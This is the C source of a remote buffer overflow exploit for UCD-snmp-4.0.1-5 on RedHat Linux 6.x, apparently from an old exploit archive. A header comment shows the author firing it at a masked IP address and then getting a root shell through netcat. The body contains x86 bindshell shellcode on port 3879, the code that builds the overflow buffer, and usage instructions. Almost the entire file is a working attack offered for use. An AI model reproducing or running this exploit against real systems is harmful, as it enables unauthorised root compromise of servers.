/*
**
** UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit
**
** === Testing: =============================================================
** 
** [x82@xpl017elz x82]$ id
** uid=501(x82) gid=501(x82) groups=501(x82)
** [x82@xpl017elz x82]$ ./snmpxpl -h 61.xx.177.32
**
**  UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit
** 
**                        Exploit made by Xpl017Elz
** 
**  Shellcode Address: 0xbfffd710
**  Host: 61.xx.177.32
**  [&shellcode: 112byte] [NOP + shellcode: 144byte] [0x00] - total 257byte
**  Open Port: 3879 (Default)
** 
** Timeout: No Response from 61.xx.177.32
** [x82@xpl017elz x82]$ nc 61.xx.177.32 3879
** whoami;
** root
** pwd;
** /home/x82
** id;
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),
** 6(disk),10(wheel),503(secure)               
**
** =========================================================================
**
** exploit by "you dong-hun"(Xpl017Elz), . 
** My World: http://x82.i21c.net
**
*/

#include 

#define DEFAULT       0
#define VALUES        112
#define HOST          "127.0.0.1"
#define DEFAULT_CODE  0xbfffd710 /* RedHat Linux 6.x ucd-snmp-4.0.1-5 */
#define SNMPWALK      "/usr/bin/snmpwalk"            /* snmpwalk PATH */

main(int argc, char *argv[]) {

char shellcode[] = /* Linux(x86) bindshell on port 3879 */
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

    char       xOx[257],
           connect[100],
          host[] = HOST,
  snmpwalk[] = SNMPWALK; 
    int count = DEFAULT,
        num_1 = DEFAULT,
        num_2 = DEFAULT,
        num_3 = DEFAULT,
        jobst = DEFAULT,
        values = VALUES;

    unsigned long shelladdr = DEFAULT_CODE;
    extern char *optarg;

    bzero(xOx, 257);
    banrl();

    while ((jobst = getopt(argc, argv, "h:s:v:")) !=EOF)
    switch (jobst) {

    case 'h': strcpy(host, optarg);                 break;
    case 's': shelladdr = strtoul(optarg, NULL, 0); break;
    case 'v': values = atoi(optarg);                break;
    case '?': usages(argv[0]);                    exit(0); 
    }

    for(num_1 = 0; num_1 <  (values / 4); num_1++) {
    xOx[count++] = (shelladdr >>  0) & 0xff;
    xOx[count++] = (shelladdr >>  8) & 0xff;
    xOx[count++] = (shelladdr >> 16) & 0xff;
    xOx[count++] = (shelladdr >> 24) & 0xff;
    }
    if((0x100 - values) < 0x00000082) { 
    printf("\n - Values error. :-(\n\n");
    printf(" Space that shellcode comes is so narrow.\n");
    printf(" Compose exploit again.\n\n");
    exit(0);
    }
    for(num_2 = 0; num_2 < (0x100 - values) - strlen(shellcode); num_2++) {
    xOx[count++] = '@';
    }
    for(num_3 = 0; num_3 < strlen(shellcode); num_3++) {
    xOx[count++] = shellcode[num_3];
    }

 printf(" Shellcode Address: %p\n", shelladdr);
 printf(" Host: %s\n", host);
 printf(" [&shellcode: %dbyte] [NOP + shellcode: %dbyte] [0x00] - total 257byte
 ",values,256-values);
 printf("Open Port: 3879 (Default)\n\n");

    execl(snmpwalk, "snmpwalk", host, xOx, NULL);

}

banrl() {

printf("\n UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit\n\n");
printf("\t\t       Exploit made by Xpl017Elz\n\n");

}

usages(char *var) {

printf("\n Usage: %s -h [hostname] -s [address] -v [value]\n",var);
printf("\n option: -h - IP address & Domain name");
printf("\n         -s - Shellcode Address");
printf("\n         -v - &Shellcode Size\n\n");
printf("\n example: %s -h 127.0.0.1 -s 0xbfffd710 -v 112\n\n",var);

}

    Source: geocities.com/f173s